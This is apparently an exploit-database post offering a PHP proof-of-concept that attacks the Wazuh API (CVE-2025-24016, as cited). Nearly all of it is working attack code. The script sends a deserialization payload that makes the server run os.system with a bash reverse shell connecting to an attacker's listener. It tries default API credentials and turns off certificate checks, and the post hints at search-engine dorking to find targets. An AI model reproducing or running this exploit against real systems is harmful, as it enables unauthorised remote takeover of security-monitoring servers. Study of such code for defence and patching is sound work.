Wazuh 4.4.0 Remote Code Execution
Wazuh 4.4.0 Remote Code Execution
=============================================================================================================================================
| # Title : Wazuh v4.4.0 Remote Code Execution (CVE-2025-24016 as referenced by the PoC). The vulnerable component is the Wazuh API; PHP is only the language of the exploit script below, not of the vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wazuh.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] Code Description:

This PHP script exploits a remote code execution (RCE) vulnerability in the Wazuh API (CVE-2025-24016, as referenced by the script).
It POSTs a JSON body whose "__unhandled_exc__" object names the class os.system and passes a bash reverse-shell command as its argument; if the server reconstructs that object as the PoC intends, the command runs on the Wazuh server and connects back to the attacker-controlled listener at the IP and port given on the command line. The script does not start that listener itself - it must already be running.

[+] save code as poc.php .

[+] Usage : php poc.php -u https://<worker-server>:55000/security/user/authenticate/run_as -i 192.168.1.10 -p 4444
    (start a listener on 192.168.1.10 first, e.g. `nc -lvnp 4444`; the request is sent with HTTP basic auth, so valid Wazuh API credentials are required - the script defaults to the wazuh-wui account)

[+] PayLoad :

<?php

// ????? ??????? ??????
// Send PHP errors to a log file next to the script instead of the terminal,
// and pin the timezone so any timestamps are unambiguous.
ini_set('error_log', 'php_errors.log');
ini_set('log_errors', '1');
date_default_timezone_set('UTC');

// ????? ???? ??????? ???????
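/**
 * Wrap $text in an ANSI colour escape sequence for terminal output.
 *
 * @param string      $text  text to colour
 * @param string|null $color one of 'error' (red), 'warning' (yellow),
 *                           'success' (green) or 'info' (cyan); any other
 *                           value, including null, returns $text unchanged.
 * @return string
 *
 * The lookup is strict: the former switch compared with ==, so a non-string
 * such as true matched the first case and was coloured red.
 */
function color_print($text, $color = null) {
    static $codes = [
        'error'   => '1;31',
        'warning' => '1;33',
        'success' => '1;32',
        'info'    => '1;36',
    ];
    if (!is_string($color) || !isset($codes[$color])) {
        return $text;
    }
    // "\033" is ESC; "\033[0m" resets attributes afterwards.
    return "\033[{$codes[$color]}m{$text}\033[0m";
}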

// ?????? ?? ???????
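/**
 * Print the runtime environment the PoC depends on.
 *
 * Reports the PHP version and whether the curl extension used by main() is
 * loaded. The previous "PyFiglet" line was a leftover from a Python original
 * and reported nothing about this script, and the try/catch around plain
 * echo statements could never trigger, so both are gone.
 */
function version_check() {
    echo "Environment:\n";
    echo "PHP: " . PHP_VERSION . "\n";
    echo "curl extension: " . (extension_loaded('curl') ? 'loaded' : 'MISSING (required by main())') . "\n";
}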

// ?????? ?? ??? ??? IP
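/**
 * Validate the listener IP address given with -i.
 *
 * Accepts any IPv4 or IPv6 literal that filter_var() validates; the value is
 * later interpolated into a shell command, so rejecting everything else is
 * what keeps that command free of attacker-controllable shell syntax.
 *
 * @param mixed $ip raw option value
 * @return bool true when valid; otherwise prints a readable error and returns false
 */
function check_ip($ip) {
    if (is_string($ip) && filter_var($ip, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $shown = is_string($ip) ? $ip : gettype($ip);
    echo color_print("Invalid IP address: $shown", 'error') . "\n";
    return false;
}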

// ?????? ?? ??? ??? Port
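/**
 * Validate the listener port given with -p.
 *
 * Requires a plain integer in 1-65535. The previous is_numeric() test also
 * accepted forms such as "1e3", "80.5" or hex-like strings, which would have
 * been interpolated verbatim into the /dev/tcp path and broken the payload.
 *
 * @param mixed $port raw option value
 * @return bool true when valid; otherwise prints a readable error and returns false
 */
function check_port($port) {
    $valid = filter_var($port, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 65535],
    ]);
    if ($valid !== false) {
        return true;
    }
    $shown = is_scalar($port) ? (string) $port : gettype($port);
    echo color_print("Invalid port (expected an integer 1-65535): $shown", 'error') . "\n";
    return false;
}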

// ?????? ?? ??? ??? URL
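/**
 * Validate the target API URL given with -u.
 *
 * The error message always promised "http:// or https://", but
 * FILTER_VALIDATE_URL alone also accepts schemes such as ftp: or mailto:,
 * so the scheme and the presence of a host are now checked explicitly.
 *
 * @param mixed $url raw option value
 * @return bool true when valid; otherwise prints a readable error and returns false
 */
function check_url($url) {
    if (is_string($url) && filter_var($url, FILTER_VALIDATE_URL) !== false) {
        $parts  = parse_url($url);
        $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
        if (isset($parts['host']) && in_array($scheme, ['http', 'https'], true)) {
            return true;
        }
    }
    $shown = is_string($url) ? $url : gettype($url);
    echo color_print("Invalid URL: $shown (must start with http:// or https:// and include a host)", 'error') . "\n";
    return false;
}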

// ???? ?????? ??????? ?? ??? ???????
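/**
 * Parse the command-line options.
 *
 * Short options: -u <api url>, -i <listener ip>, -p <listener port>; -c and
 * -n take an optional value (kept from the original string, unused by main()).
 * Long options: --user=<api user>, --pass=<api password>.
 *
 * "user::" and "pass::" used to sit inside the short-option string, where
 * getopt() reads them as individual one-letter flags, so --user/--pass were
 * never recognised and main() always fell back to its defaults. They are
 * declared as long options here.
 *
 * @return array parsed options; an empty array (instead of false) if getopt() fails,
 *               which keeps the isset() checks in main() valid either way.
 */
function parse_args() {
    $opts = getopt('u:i:p:c::n::', ['user:', 'pass:']);
    return $opts === false ? [] : $opts;
}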

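/**
 * Entry point of the PoC.
 *
 * Flow: parse and validate the options, print environment information, POST
 * the deserialization payload to the Wazuh API URL given with -u and report
 * the outcome. The payload asks the server to run a bash reverse shell back
 * to the listener address given with -i/-p.
 *
 * Nothing here starts a listener: the shell connects back to -i:-p, so a
 * listener (e.g. `nc -lvnp <port>`) must already be running on that host
 * before this script is invoked. Spawning `bash -i` locally after the request
 * (as the script used to do) only captured that shell's output and never
 * acted as a listener, so it was removed.
 *
 * Exit status is 1 on bad arguments, a transport error or a non-200 reply.
 */
function main() {
    $args = parse_args();

    // -u, -i and -p are mandatory; user/pass (if parse_args() provides them)
    // fall back to the default API account below.
    if (!isset($args['u'], $args['i'], $args['p'])) {
        echo color_print("Usage: php poc.php -u <api-url> -i <listener-ip> -p <listener-port>", 'error') . "\n";
        exit(1);
    }

    // Validate before anything is interpolated into the shell command below.
    if (!check_ip($args['i']) || !check_port($args['p']) || !check_url($args['u'])) {
        exit(1);
    }

    version_check();

    echo "Wazuh RCE - CVE-2025-24016\n";
    echo "Credits: Jessie, Aiman, Cahyo, Ihsan, Arch\n";

    $listener_ip   = $args['i'];
    $listener_port = (int) $args['p']; // check_port() guarantees 1-65535

    // The PoC relies on the API reconstructing the object described by
    // "__unhandled_exc__": the class named in "__class__" is instantiated with
    // "__args__", so os.system() runs the reverse shell. IP and port were
    // validated above, which is what keeps the command free of injected
    // shell syntax.
    $payload = [
        '__unhandled_exc__' => [
            '__class__' => 'os.system',
            '__args__'  => ["bash -i >& /dev/tcp/{$listener_ip}/{$listener_port} 0>&1"],
        ],
    ];

    // The request is sent with HTTP basic auth, so valid API credentials are
    // needed; the defaults are the stock wazuh-wui account.
    $username = $args['user'] ?? 'wazuh-wui';
    $password = $args['pass'] ?? 'MyS3cr37P450r.*-';

    echo color_print("A listener must already be running on {$listener_ip}:{$listener_port} (e.g. nc -lvnp {$listener_port}). Sending payload...", 'info') . "\n";

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $args['u'],
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => json_encode($payload),
        CURLOPT_HTTPHEADER     => ['Content-Type: application/json'],
        CURLOPT_USERPWD        => "$username:$password",
        // The Wazuh API usually presents a self-signed certificate. Disabling
        // peer verification alone leaves hostname verification on, which can
        // still reject a certificate whose name does not match the URL, so
        // both are switched off. PoC only: never do this in production code.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $response    = curl_exec($ch);
    $curl_error  = curl_error($ch);
    $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($response === false) {
        // A timeout is not proof of failure: if the reverse shell connected,
        // the API handler may still be blocked inside os.system(), so no
        // reply ever arrives. Check the listener before concluding anything.
        echo color_print("Request failed: $curl_error", 'warning') . "\n";
        echo color_print("If the listener received a connection, the payload worked despite the transport error.", 'info') . "\n";
        exit(1);
    }

    if ($status_code !== 200) {
        echo color_print("Unexpected HTTP status: $status_code", 'error') . "\n";
        if (strpos($response, 'Unauthorized') !== false) {
            echo color_print("Authentication failed - check the API credentials.", 'error') . "\n";
        } else {
            echo color_print("Server response: $response", 'error') . "\n";
            echo color_print("A non-200 reply does not necessarily mean the command did not run; check the listener.", 'info') . "\n";
        }
        exit(1);
    }

    echo color_print("Request accepted by the server (HTTP 200).", 'success') . "\n";
    echo "Response: " . color_print($response, 'info') . "\n";
    echo color_print("Check the listener on {$listener_ip}:{$listener_port} for the incoming shell.", 'info') . "\n";
}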

main(); // Run the PoC; main() exits with status 1 on any failure.

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================